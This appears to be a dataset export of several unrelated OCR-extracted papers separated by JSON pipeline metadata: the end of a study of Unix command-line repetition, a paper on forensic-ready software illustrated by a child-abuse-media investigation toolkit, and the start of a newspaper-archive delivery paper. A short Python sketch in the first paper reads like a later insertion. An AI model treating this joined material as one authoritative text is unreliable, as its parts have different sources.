**Partial Matches.** Instead of the next command line matching a previous one exactly, partial matching may be allowed. This is helpful when people make simple spelling mistakes, the same command and options are invoked on different arguments, command lines are extended, and so on. However, the benefit is highly user-dependent, for the selected sequence must be altered before it is invoked. We investigated partial matches by prefix, where the matched command line is a prefix of the next command line, up to and including a complete match.

**Combinations.** The strategies above are not mutually exclusive, and all can be combined in a variety of ways. The bottom half of columns 2 and 3 of Table 2 shows one such possibility, where the event list is conditioned by directory sensitivity and pruning.

---

\(^2\) This aspect of our study is reported in greater detail in a companion paper, which includes a discussion on individual differences in command selection and use [8].

\(^3\) Properly associating a user's commands with their tasks or goals is not easy. We recognize that grouping commands by the current directories (or perhaps by the obvious alternative of windows) is just an estimate — possibly a poor one — of actual task contexts.

\(^4\) In Unix, users change directories through the cd command. The ~ is shorthand for the home directory. Following ~/'s indicate sub-directories.
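As a concrete, simplified illustration of two of these conditioning techniques, the Python sketch below prunes duplicates so that each command line keeps only its latest position, and offers prefix-matched candidates from a small working set. This is an illustration, not the mechanism evaluated in the study; the example history is hypothetical.

```python
# Hedged sketch of two conditioning techniques discussed above.

def prune_latest(history):
    """Remove duplicates, keeping each command line in its latest position."""
    pruned = []
    for line in reversed(history):
        if line not in pruned:
            pruned.append(line)
    return list(reversed(pruned))

def prefix_candidates(history, typed, working_set=10):
    """Return recent pruned entries (most recent first) having `typed` as a prefix."""
    recent = list(reversed(prune_latest(history)))[:working_set]
    return [line for line in recent if line.startswith(typed)]

hist = ["ls", "edit draft", "print draft", "edit draft",
        "cd ~/figures", "ls", "edit fig1", "edit fig2"]
print(prune_latest(hist))               # duplicates migrate to their latest position
print(prefix_candidates(hist, "edit"))  # prefix-matched re-selection candidates
```

Pruning to the latest position mirrors the choice made above: repeated lines migrate forward, so unique and low-probability entries drift to the back of the list over time.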
<table>
  <thead>
    <tr>
      <th>Sequential (starting in ~/.text)</th>
      <th>Directory sensitive (context is ~/.text)</th>
      <th>Directory sensitive (context is ~/.figures)</th>
      <th>Duplicates removed (original position)</th>
      <th>Duplicates removed (latest position)</th>
    </tr>
  </thead>
  <tbody>
    <tr><td>1 ls</td><td>1 ls</td><td>6 ls</td><td>1 ls</td><td>4 edit draft</td></tr>
    <tr><td>2 edit draft</td><td>2 edit draft</td><td>7 edit fig1</td><td>2 edit draft</td><td>8 edit fig2</td></tr>
    <tr><td>3 print draft</td><td>3 print draft</td><td>8 edit fig2</td><td>3 print draft</td><td>9 graph fig1</td></tr>
    <tr><td>4 edit draft</td><td>4 edit draft</td><td>9 graph fig1</td><td>5 cd ~/.figures</td><td>10 ls</td></tr>
    <tr><td>5 cd ~/.figures</td><td>5 cd ~/.figures</td><td>10 ls</td><td>7 edit fig1</td><td>11 edit fig1</td></tr>
    <tr><td>6 ls</td><td>13 print draft</td><td>11 edit fig1</td><td>8 edit fig2</td><td>12 cd ~/.text</td></tr>
    <tr><td>7 edit fig1</td><td>14 cd ~/.figures</td><td>12 cd ~/.text</td><td>9 graph fig1</td><td>13 print draft</td></tr>
    <tr><td>8 edit fig2</td><td></td><td></td><td>12 cd ~/.text</td><td>14 cd ~/.figures</td></tr>
    <tr><td>9 graph fig1</td><td></td><td></td><td></td><td></td></tr>
    <tr><td>10 ls</td><td></td><td></td><td></td><td></td></tr>
    <tr><td>11 edit fig1</td><td></td><td></td><td></td><td></td></tr>
    <tr><td>12 cd ~/.text</td><td></td><td></td><td></td><td></td></tr>
    <tr><td>13 print draft</td><td></td><td></td><td></td><td></td></tr>
    <tr><td>14 cd ~/.figures</td><td></td><td></td><td></td><td></td></tr>
    <tr><td></td><td colspan="2"><em>Directory sensitive with duplicates removed (latest position)</em></td><td></td><td></td></tr>
    <tr><td></td><td>1 ls</td><td>8 edit fig2</td><td></td><td></td></tr>
    <tr><td></td><td>4 edit draft</td><td>9 graph fig1</td><td></td><td></td></tr>
    <tr><td></td><td>13 print draft</td><td>10 ls</td><td></td><td></td></tr>
    <tr><td></td><td>14 cd ~/.figures</td><td>11 edit fig1</td><td></td><td></td></tr>
  </tbody>
</table>

Table 2: Four examples of a conditioned event list

Figure 2: Conditioning the probability distribution

Data from the Experienced Programmers subject group, each of whom used more than one directory, was reanalyzed by applying the above conditions to the traces. The cumulative probability distributions of all conditions and their combinations are illustrated graphically in Figure 2. Creating context-sensitive directory lists decreases the overall recurrence rate from 74% to 65%, as command lines entered in one directory are no longer available in others. Although this reduction means that plain sequential lists out-perform directory-sensitive ones over all previous entries, benefits were observed over small working sets. The first three directory-sensitive items are more probable than their equivalent sequential items, approximately equal for the fourth, and slightly less likely thereafter. With a working set of ten items, directory sensitivity increases the overall probability of the working set by 2.5%.

Although pruning duplicates off the history list does not alter the recurrence rate, it does shorten the total distance covered by the distribution. As the working set size increases, so do the accumulated probabilities when compared to the standard sequential list (Figure 2). Pruning duplicates increases the overall probability of a ten-item working set by 5%.

Pattern matching by prefixes increases the recurrence rate to 84%.\(^5\) As partial matches are found before more distant (and perhaps non-existent) exact matches, an increase is expected in the rate of growth of the cumulative probability distribution. This increase is illustrated in Figure 2. Conditioning by partial matching increases the overall probability of a ten-item working set by around 6%.

When conditioning methods are combined, the effects are slightly less than additive. Figure 2 illustrates these combinations. For example, a partially-matched, pruned and directory sensitive history mechanism out-performs a plain sequential one by 13% with a working set of ten items.

**Actual use of Unix history**

We have seen that user dialogues are highly repetitive and that the last few command lines have the greatest chance of recurring — the premise behind most history systems. But are current history mechanisms used well in practice?
We investigated this by analysing each user’s `csh` history use. The recurrence rate and its probability distribution, studied previously, provides a value against which to assess how well history mechanisms are used in practice. The average rate of re-selecting items through history cannot exceed the recurrence rate, which was found to be 74%. By comparing the user’s actual re-selection rate when using a particular history mechanism with this maximum, the system’s practical effectiveness can be judged. Table 1 shows how many users of UNIX `csh` in each sample group actually used history. Although 54% of all users recalled at least one previous action, this figure is dominated by the computer sophisticates. Only 20% of Novice Programmers and 36% of Non-Programmers used history, compared to 71% for Computer Scientists and 92% for Experienced Programmers. Those who made use of history did so rarely. On average, 3.9% of command lines referred to an item through history, although there was great variation (\(\text{std dev} = 3.8; \text{range} = 0.05\% - 17.5\%\)). This average rate varied slightly across groups, as illustrated by the last column in Table 1, but an analysis of variance indicated that differences are not statistically significant (\(F(3, 86) = 1.02\)). In practice, users did not normally refer very far back in history. With the exception of novices, an average of 79 – 86% of all history uses referred to the last five command lines. Novice Programmers achieved this range within the last two command lines. Figure 3 illustrates the nearsighted view into the past. Each line is the running sum of the percent of history use accounted for (the vertical axis) when matched against the distance back in the command line sequence (the horizontal axis). The differences between groups for the last few actions reflect how far back each prefers to see. Although most uses of history recall the last or second last entry, it is unclear which is referred to more. --- \(^5\)In this context, the recurrence rate is the probability that any previous event is a prefix of the current command line. It was also noticed that history was generally used to access or slightly modify the same small set of command lines repeatedly within a login session. If history was used to recall a command line, it was highly probable that subsequent history recalls will be to the same command. Subjects indicated that they are discouraged from using csh by its difficult syntax, the incomprehensible manual entry, and the fact that previous events are not normally kept on display. Also, the typing overhead necessary to specify all but the simplest retrievals makes them feel that it is not worth the bother. Discussion Our analyses of command line recurrences within the UNIX csh dialogue produced specific results in several areas. Based on these results we formulate some empirically-based general principles of how users repeat their actions on computers. 1. A substantial portion of each user's previous actions are repeated. In spite of the large number of options and arguments that could qualify a command, command lines are repeated surprisingly often. 2. New command lines are composed regularly. Although many actions are repeated, a sizeable proportion are new. 3. Users exhibit considerable recency. The major contributions to the recurrence distribution are provided by the last few command lines entered, independent of context. 4. Some actions remain outside the local working set. 
A significant number of recurring items are not covered by the last few items. Doubling or even tripling the size of the working set does not increase the coverage significantly. 5. Working sets can be improved by suitable conditioning. A perfect "history oracle" would always predict the next user command line correctly, if it was a repeat of a previous one. As no such oracle exists, we can only contemplate and evaluate methods that offer the user reasonable candidates for re-selection. Although simply looking at the previous n user actions is reasonably effective, context sensitivity, pruning duplicates and partial matches increase coverage to some degree. 6. When using history, users continually recall the same command lines. UNIX users generally use history for recalling the same events within a log-in session. 7. Unix csh history does poorly. Most people (especially novices and non-programmers) don't use it. Those who do, don't use it much.

General design guidelines are self-evident from these principles. Once the style of interface is specified, the guidelines formed could become much more specific. For example, if a menu of the previous n items is to be displayed, and no user data is available, the best value of n could be estimated from the recurrence distributions shown in this paper. Similarly, the complexity required by syntactic constructs used to retrieve command lines in glass-teletype history mechanisms can be judged (i.e., constructs retrieving probable command lines should be simple). Or perhaps context conditioning for window-based interfaces could be defined by window context, rather than by directory. It is beyond the scope of this short paper to discuss all possibilities.

Conclusions

This paper has set out empirically-justified principles of how people repeat command lines, and indicated that the high recurrence rate observed justifies the inclusion of history mechanisms in certain user interfaces. Using these principles, designers now have a basis for evaluating and fine-tuning existing history mechanisms, or creating new ones. There are still many unanswered questions. We have not formed any hypotheses of why users repeat their actions the way they do. Nor do we know how generalizable our results are. We are now in the process of extending this investigation, both through further analysis and through applying our results to the design and implementation of a window-based history mechanism, and are working towards integrating history with task-oriented workspaces [10].

References
{"Source-Url": "http://grouplab.cpsc.ucalgary.ca/grouplab/uploads/Publications/Publications/1988-RepeatActions.CHI.pdf", "len_cl100k_base": 5694, "olmocr-version": "0.1.53", "pdf-total-pages": 8, "total-fallback-pages": 0, "total-input-tokens": 9144, "total-output-tokens": 7241, "length": "2e12", "weborganizer": {"__label__adult": 0.0003807544708251953, "__label__art_design": 0.002521514892578125, "__label__crime_law": 0.00026679039001464844, "__label__education_jobs": 0.00624847412109375, "__label__entertainment": 0.00023484230041503904, "__label__fashion_beauty": 0.00021195411682128904, "__label__finance_business": 0.0003709793090820313, "__label__food_dining": 0.0003342628479003906, "__label__games": 0.0008912086486816406, "__label__hardware": 0.003017425537109375, "__label__health": 0.00063323974609375, "__label__history": 0.0005927085876464844, "__label__home_hobbies": 0.00016069412231445312, "__label__industrial": 0.0004143714904785156, "__label__literature": 0.00098419189453125, "__label__politics": 0.00023829936981201172, "__label__religion": 0.0004799365997314453, "__label__science_tech": 0.167724609375, "__label__social_life": 0.00015819072723388672, "__label__software": 0.05572509765625, "__label__software_dev": 0.75732421875, "__label__sports_fitness": 0.0002288818359375, "__label__transportation": 0.0005097389221191406, "__label__travel": 0.00019037723541259768}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 32473, 0.0255]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 32473, 0.65665]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 32473, 0.91709]], "google_gemma-3-12b-it_contains_pii": [[0, 4420, false], [4420, 9789, null], [9789, 15638, null], [15638, 17860, null], [17860, 20900, null], [20900, 24648, null], [24648, 29244, null], [29244, 32473, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4420, true], [4420, 9789, null], [9789, 15638, null], [15638, 17860, null], [17860, 20900, null], [20900, 24648, null], [24648, 29244, null], [29244, 32473, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 32473, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 32473, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 32473, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 32473, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 32473, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 32473, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 32473, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 32473, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 32473, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 32473, null]], "pdf_page_numbers": [[0, 4420, 1], [4420, 9789, 2], [9789, 15638, 3], [15638, 17860, 4], [17860, 20900, 5], [20900, 24648, 6], [24648, 29244, 7], [29244, 32473, 8]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 32473, 0.17557]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
1f5187aaaf54b569b719062e2d266bada91edc57
Towards Forensic-Ready Software Systems

Conference Paper, January 2018. DOI: 10.1145/3183399.3183426

Liliana Pasquale, University College Dublin, Ireland
Dalal Alrajeh, Imperial College London, UK
Claudia Peersman, University of Bristol, UK
Thein Tun, The Open University, UK
Bashar Nuseibeh, The Open University, UK & Lero, Ireland
Awais Rashid, University of Bristol, UK

ABSTRACT

As software becomes more ubiquitous, and the risk of cyber-crimes increases, ensuring that software systems are forensic-ready (i.e., capable of supporting potential digital investigations) is critical. However, little or no attention has been given to how well-suited existing software engineering methodologies and practices are for the systematic development of such systems. In this paper, we consider the meaning of forensic readiness of software, define forensic readiness requirements, and highlight some of the open software engineering challenges in the face of forensic readiness. We use a real software system developed to investigate online sharing of child abuse media to illustrate the presented concepts.

CCS CONCEPTS

• Software and its engineering → Requirements analysis; • Applied computing → Evidence collection, storage and analysis;

KEYWORDS

Requirements, Forensic readiness, Forensic-ready Systems, Digital Forensics

1 INTRODUCTION

Forensic readiness represents the capability of an organization to support digital investigations proactively, i.e., before an incident occurs [24]. It is realized through the production of evidence that (i) facilitates the investigation and demonstration of compliance to organizational and regulatory policies, and (ii) can support legal proceedings [9]. To date, however, researchers' attention has been geared towards the provision of general guidelines that could potentially enhance organizations' operational and infrastructural capabilities to achieve forensic readiness. Little or no attention has been given to how the software systems deployed within these organizations can be designed to be themselves forensic-ready. With a rapid rise in cybercrime and cyber-enabled crime—number of identity theft incidents increased by 222% in 2016 [7] whilst online child sexual exploitation increased by 135% in 2016 [21]—there is an urgent need to consider what forensic readiness means for software systems and how such readiness can be incorporated as part of software development processes. Work in this area is either very preliminary or has been limited to specific aspects of forensic readiness, such as ensuring that evidence relevant to potential incidents is preserved [3, 17, 19] or that evidence integrity is maintained [16].
No work to date has considered the wider potential or implication of rigorous software engineering on the development of forensic-ready systems. Our vision is to investigate the notion of forensic readiness in software systems and understand how forensic-ready software systems can be developed systematically. To achieve this vision we investigate forensic readiness requirements over software systems and assumptions over their encompassing environment. Requirements and assumptions can be used to derive implementable software specifications that achieve forensic readiness. Some of these requirements are data-centred, aimed to ensure availability, relevance, minimalism, non-repudiation, completeness, and linkability of data. Others are process-centred, aimed to ensure that the process through which the software system performs digital forensic activities is sound. We elicit forensic readiness requirements by reviewing existing literature and examining a real world investigative toolkit, iCOP [20], which was designed with the purpose of facilitating investigations of online child abuse media shared through P2P networks. Finally, we present open research challenges that relate to different aspects of engineering forensic-ready software systems and that consider how such systems can operate within emerging cyber-physical environments. 2 SOFTWARE FORENSIC READINESS Although forensic readiness is a notion that is not new in the context of digital forensics, what it means and how it is conceptualised, differs amongst researchers, e.g., [11, 22, 24, 27]. In this paper, we are interested in what forensic readiness means for software engineering practices. At the heart of digital forensic readiness is the digital data, including the media and the activity logs available within an organization’s information system network, or on users’ devices. These data could hold valuable information about how a particular incident occurred and by whom, potentially resulting in a successful prosecution of the perpetrator [5, 13]. In this context, forensic readiness of system network or devices implies maximal usefulness of the data held as potential digital evidence. admissible in court. Such usefulness can only be attained if the data and the process through which they are acquired, analysed and stored is forensically sound. (A forensically sound process is one that maximizes the evidentiary weight of digital evidence [18], whilst forensically sound evidence is one that can endure legal scrutiny in a court of law [10].) We take the view that forensic readiness in the context of software engineering is a property that encapsulates the capabilities of software to: (1) conduct digital forensic processes in a forensically sound way; and (2) produce forensically sound evidence. As we are concerned with developing software that ensures forensic soundness of data and processes, prior to the occurrence of an incident or attack, such capabilities must be proactive. Furthermore, we consider forensic readiness to be a property that is achievable either partially or fully, depending on the software capabilities, and is with respect to a set of speculated incidents that an organization has identified and assessed as critical. 3 MOTIVATING EXAMPLE To provide a sense of our envisaged research direction and challenges to overcome, we discuss the iCOP toolkit [20]. 
This has the main purpose of identifying, preserving and analysing new or previously unknown child sexual abuse (CSA) media shared by suspects on peer-to-peer (P2P) networks. As shown in Figure 1, iCOP has two major components: the P2P Engine and the Analysis Engine. The P2P engine monitors information (e.g., IP addresses, filenames and hash values of files) together with metadata (e.g., when a user was last seen sharing a file) from public traffic on P2P networks. This information is passed on to the Analysis Engine, which compares the monitored hash values to a list of known hashes of CSA media seized by law enforcement. This allows the system to disregard CSA media already known to law enforcement. The file names that do not occur in the known hash lists are then analysed to assess their likelihood of containing CSA media. File names flagged as suspicious are passed back to the P2P Engine for downloading. The content of the downloaded files is subsequently analysed automatically by a Media Analysis module to determine whether the files contain child abuse material. Finally, the resulting list of suspicious new or previously unknown files is examined by investigators to confirm whether they contain child abuse images and videos. Once confirmed, these items are fed back into the hash database as known CSA media in future searches. Figure 1: Overview of the iCOP toolkit We aim to explore new software engineering methodologies and techniques for the design of software systems capable of supporting digital investigations proactively. In what follows, we consider the key requirements that software systems must satisfy and illustrate such requirements using the iCOP toolkit. 4 FORENSIC READINESS REQUIREMENTS In this section, we describe a preliminary set of requirements for forensic-ready systems that were elicited by reviewing existing literature on forensic readiness. We discuss the requirements in the context of the iCOP toolkit. We also distinguish between requirements that are data-centred and others that are process-centred. Availability. Data that may be useful for investigating potential incidents should be available [24, 27]. To achieve availability, data that may provide investigative clues must be preserved and retrievable by law enforcement agencies or individuals who are in charge of conducting an investigation. As data may not be kept in non-volatile memories (e.g., network traffic) and physical devices can have limitations (e.g., damaged hard drives), the capability to preserve data proactively must be in place. Preservation can be triggered by changes in the data to be collected [25], can be performed periodically [30] or for a limited amount of time [14], in order not to consume resources (e.g., battery power in a mobile device). To facilitate retrieval of preserved data, metadata should also be stored. In the context of the iCOP toolkit, data that can be useful to investigate incidents can be video and image files indicating a new child abuse and information about the users sharing CSA media (e.g., IP address, client ID). However, not all files can be preserved successfully because downloads are often slow and they stall if the computers sharing the file go off-line. To facilitate retrieval of such data, CSA related material, P2P network users and victims should be identified unambiguously. This is challenging because often the same CSA material is shared under different filenames and victims can appear in different files. Relevance. 
Data preserved proactively should be relevant to potential incident cases [28]. Relevance of data means whether data is able to support or refute hypotheses explaining how incidents occurred [3]. Ensuring relevance of preserved data allows an organization to have the data preservation activities more targeted on the risks to the business [24]. Relevance can be subject to the judgement of an investigator [26] and is typically determined by the files and data types available [12, 23] (e.g., email addresses, message information, date and time information, cookies, social security and credit card numbers from a computer hard disk image). In our example, to satisfy the relevance requirement, iCOP should ensure that stored CSA media is of new material or previously unknown. This is challenging because analysing the content of any file shared on the P2P network is not computationally tractable. The iCOP toolkit uses textual features of the filenames and characteristics of the users sharing the files (e.g., users sharing the greatest number of suspected files or sharing the greatest number of files) to identify CSA related media. However, files that do not contain any textual clues to their illegal content -which otherwise is relevant data - or that are shared by new users may not be preserved. Minimality. Data preserved proactively should not include any information that is unnecessary for the purpose of an investigation. Satisfaction of this goal can have the side-effect of reducing the amount of resources that are spent looking for digital evidence and, therefore, the costs of an investigation [27]. In our case study, to satisfy the minimality goal, the iCOP toolkit should not preserve files that do not refer to a child abuse case (false positives). A typical false positive error can be when webcam videos showing a child without any adult interaction are considered as CSA material. Satisfaction of the minimal goal highly depends on the type of data to be preserved; in our example, considering the difficulty of recognising CSA content, the minimal goal cannot be fully met. **Linkability.** Preserved data should be linkable with other pieces of evidence, such as other evidence and witness statements. This is very important to reconstruct how an incident took place when heterogeneous data are preserved, as it allows creating cause-effect relations between incident activities indicated by different evidences [24]. In the iCOP toolkit, ensuring linkability between media sharing is important to identify an individual sharing specific content uniquely. A connection is assumed to be a single user sharing a given set of files from a specific location. Storing the IP and the geolocation information (GUID), an investigator can easily view which connections are related via a common IP address or GUID. Additionally, all files that are confirmed to contain CSA content can be used by police investigators to identify unknown victims. **Completeness.** Preserved data should be sufficient to satisfy or refute an incident hypothesis. Satisfaction of this goal depends on the scope of an investigation, i.e., the portion of the environment in which an incident is assumed to have happened. For example, the scope of an investigation may be enlarged to include additional digital sources which can provide information about the location of new sources of evidence that may be relevant for the incident [15]. 
To satisfy the completeness goal, the iCOP toolkit should ensure preservation of any media related to child abuse that is shared on P2P networks. Currently the scope of the iCOP toolkit is limited to the Gnutella file sharing network and other P2P networks or social media are not considered. Achieving completeness requires making assumptions on the boundary of the investigation; this goal would be impossible to achieve if this boundary is not fixed. **Non-Repudiation.** Preserved data should constitute an evidence that is admissible legally and should be accepted in a court of law [8]. To achieve this goal preserved data should satisfy the integrity requirement, i.e. they should not be tampered from the time of acquisition until its final disposition [24, 27]. Preserved data should provide high assurances about their authenticity; for example, only specific trusted parties should be authorised to access it [24]. The chain of custody of data should also be maintained [24]. This means that all changes in the control, handling, possession, ownership or custody of a piece of evidence should be documented. In our example, iCOP should ensure that preserved CSA content can only be accessed by police investigators in possession of login credentials. Moreover it should provide techniques to assess authenticity of media files and maintain their chain of custody. Additional tools and procedures to satisfy these requirements must be adopted by the individual law enforcement agencies. **Data provenance.** The process adopted to preserve data should record when, how and by whom such data is originated, moved and modified over time. The Transparent Computing1 program encourages provenance of system components to identify relationships between system activities [6] that may be related to a cyber threat. As provenance information can grow over time it is also necessary to summarise such information meaningfully [2]. In our example, data provenance can refer to preservation of files meta-data (e.g., creation date) that provide more information about multiple abuses of the same victim over time. Data about the P2P users can also support identification of new users sharing CSA material. **Legal compliance.** The process adopted to preserve data should ensure compliance with existing regulations, which may vary depending on the jurisdiction(s) in which an incident may occur. Identification of what regulations apply to a specific system depends on the nationality and the physical location of the data subject, as well as the physical location of the organization collecting data. For example, the General Data Protection Regulation (GDPR)2 in Europe and the Fourth Amendment in USA [1] regulate what data can be preserved and under which conditions (privacy). The EU Data Retention Directive, can prescribe for how long data should be retained (retention). The GDPR also prescribes for how long data be accessed and by whom (access to retained data). For the iCOP case study, media files can be preserved in UK because they are “voluntarily” shared to third parties but this would not apply in other European countries, such as Belgium. Any monitoring and downloading of CSA media can only take place at suitable law enforcement premises and access to CSA material is only given to police investigators, in order to ensure privacy of victims’ identities. ## 5 SOFTWARE ENGINEERING CHALLENGES We elicit a number of open software engineering challenges. 1. 
**Representing and reasoning about forensic-ready systems.** We have presented a first conceptualization of forensic readiness requirements of software systems. There is a need to build a consensus around the key characteristics of forensic-ready software systems. We can divide the implications and challenges into three sub-categories: (i) concept (how to represent and reason about forensic-ready systems and their properties), (ii) method (how to design and implement forensic-ready systems), and (iii) tools (how to analyse and support the development of forensic-ready systems). Existing work on concepts and taxonomy of dependability [4] could be a useful reference model to extend to forensic readiness. Such characterization would facilitate a better understanding of the potential relationship between forensic-ready requirements and other types of requirements such as security, privacy and safety. Furthermore, there is a need to characterise forensic-ready systems formally. This requires identifying formal languages—if any—that are best suited to express forensic readiness requirements, and will allow us to understand the extent to which existing representation and reasoning techniques are applicable to forensic-ready systems. 2. **Methods for engineering forensic-ready software systems.** The notion of forensic readiness poses challenging questions for software engineering methods and particularly how should existing methods adapt to account for forensic readiness requirements. Research is needed to answer a number of fundamental questions related to how requirements for forensic-ready systems should be implemented and whether these requirements are solely about data preservation activities. Architectural patterns (similar to security patterns [29]) could also be investigated to design forensic-ready systems. Additional challenges relate to managing trade-offs between forensic readiness requirements such as privacy and availability given that some of these could manifest at runtime. For --- 1[https://www.darpa.mil/program/transparent-computing](https://www.darpa.mil/program/transparent-computing) 2Regulation (EU) 2016/679 3. Verification of forensic readiness requirements. A key challenge is verifying that existing software systems satisfy forensic readiness requirements. Research questions relate to whether these requirements need to develop different verification techniques compared to those adopted to verify safety and security properties and whether satisfaction of forensic readiness requirements can be guaranteed at design time. Our analysis of the iCOP system demonstrates that satisfaction of forensic readiness requirements cannot be blanket and trade-offs arise from the interaction of forensic readiness requirements with properties of the environment or various (human or software) agents and investigative processes that interface with a software system. There are also interesting challenges with regards to impact on other functionality of the system, for instance, ensuring that runtime forensic processes are not intrusive and disruptive of normal system functions. 4. Technological developments. Perhaps the wicked problem posed for forensic readiness is the one arising from the increasing deployment of Internet of Things (IoT) devices—and the software embedded within these devices—in everyday settings. 
In such smart cyber-physical environments, the system design cannot be anticipated a-priori and is only emergent a-posteriori when various IoT devices dynamically compose to deliver various services. Even more critically this emergent design is volatile in that the system configuration—and the devices engaged—may change on a regular basis. An example of this is a user with wearables walking through a smart city environment with various devices coming in and out of range and interfacing with each other. Such a dynamically aggregated environment poses major challenges for forensic readiness of software systems—how are the goals of availability, relevance, non-repudiation, legal compliance, completeness, minimality, and linkability impacted in such a setting is a non-trivial question to be addressed by software engineering research. 6 CONCLUSION In this paper we investigated the notion of forensic readiness in software systems and the requirements that support its attainment, highlighting some of the open software engineering challenges. For future work we plan to provide a formal characterization of forensic readiness requirements. We will also explore techniques for analyzing trade-offs between conflicting requirements. Finally we will investigate aspects related to the implementation of a forensic-ready system, such as the generation of specification for such systems or assessment of relevance of preserved data. ACKNOWLEDGEMENTS This work is supported by EPSRC Grant: EP/N028112/1, EU Safer Internet Programme project SI 2601002, and SFI Grants 10/CE/1855, 13/RC/2094 and 15/SIRG/3501. Addendum: This work received funding from the ERC for the project Adaptive Security and Privacy (ERC Advanced Grant 291652) REFERENCES
{"Source-Url": "http://oro.open.ac.uk/55503/8/55503.pdf", "len_cl100k_base": 4268, "olmocr-version": "0.1.53", "pdf-total-pages": 6, "total-fallback-pages": 0, "total-input-tokens": 16255, "total-output-tokens": 6576, "length": "2e12", "weborganizer": {"__label__adult": 0.0019550323486328125, "__label__art_design": 0.00112152099609375, "__label__crime_law": 0.11871337890625, "__label__education_jobs": 0.0048370361328125, "__label__entertainment": 0.0002694129943847656, "__label__fashion_beauty": 0.0006895065307617188, "__label__finance_business": 0.0006694793701171875, "__label__food_dining": 0.0009398460388183594, "__label__games": 0.0030612945556640625, "__label__hardware": 0.00357818603515625, "__label__health": 0.002727508544921875, "__label__history": 0.001094818115234375, "__label__home_hobbies": 0.00030541419982910156, "__label__industrial": 0.0013942718505859375, "__label__literature": 0.0012950897216796875, "__label__politics": 0.001949310302734375, "__label__religion": 0.001056671142578125, "__label__science_tech": 0.0941162109375, "__label__social_life": 0.0004396438598632813, "__label__software": 0.03387451171875, "__label__software_dev": 0.72314453125, "__label__sports_fitness": 0.000926971435546875, "__label__transportation": 0.0016384124755859375, "__label__travel": 0.0004398822784423828}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 28195, 0.06289]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 28195, 0.30581]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 28195, 0.89626]], "google_gemma-3-12b-it_contains_pii": [[0, 710, false], [710, 1202, null], [1202, 6392, null], [6392, 12961, null], [12961, 20208, null], [20208, 28195, null]], "google_gemma-3-12b-it_is_public_document": [[0, 710, true], [710, 1202, null], [1202, 6392, null], [6392, 12961, null], [12961, 20208, null], [20208, 28195, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 28195, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 28195, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 28195, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 28195, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 28195, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 28195, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 28195, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 28195, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 28195, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 28195, null]], "pdf_page_numbers": [[0, 710, 1], [710, 1202, 2], [1202, 6392, 3], [6392, 12961, 4], [12961, 20208, 5], [20208, 28195, 6]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 28195, 0.0]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
3e8170300824d35f00bafbe143aafff8ee9ae5ef
Introduction

This paper will discuss some of the requirements for the successful online delivery of newspaper archive content to users and examine an innovative approach taken to fulfil those requirements by using a semantic framework. This approach is based on the digital library delivery system configured by the New Zealand Electronic Text Centre (NZETC), the working name of which is the Topic Map Presentation Framework (TMPF). It has been developed as a production system at the NZETC since 2002 and is currently used to deliver the Centre's own growing collection of digital resources, a nationally important website containing more than 40,000 pages and over half-a-million hyperlinks. Since 2005 the NZETC has been working with APEX to further develop the TMPF as a means of providing sophisticated access to digitised newspaper archives wherein the semantic navigation of online resources greatly enhances the user experience in digital libraries. Using this approach, an ontology codifies an analysis of the structure and relationships in the domain of newspaper publishing and archiving, including publishers, issues, articles, pages, clippings, places, and dates. Metadata is automatically harvested from the source materials into this conceptual framework, producing a map of the content. This map is then used to present the content online in a meaningful structure. This paper will also briefly cover some of the open technologies used, including Topic Maps, the CIDOC Conceptual Reference Model, Apache Cocoon, and Apache Lucene.

Delivering newspaper content over the web

Delivering newspaper content over the web presents many challenges and requires a delivery system that is technically sophisticated on the inside and intuitive to use on the outside. There are challenges to be met in several areas: the forms of content to be delivered, the granularity of access provided, modes of access enabled, extensibility, customization, usability and performance. This section will look briefly at each of these areas in turn to provide a context for the subsequent discussion of the TMPF.

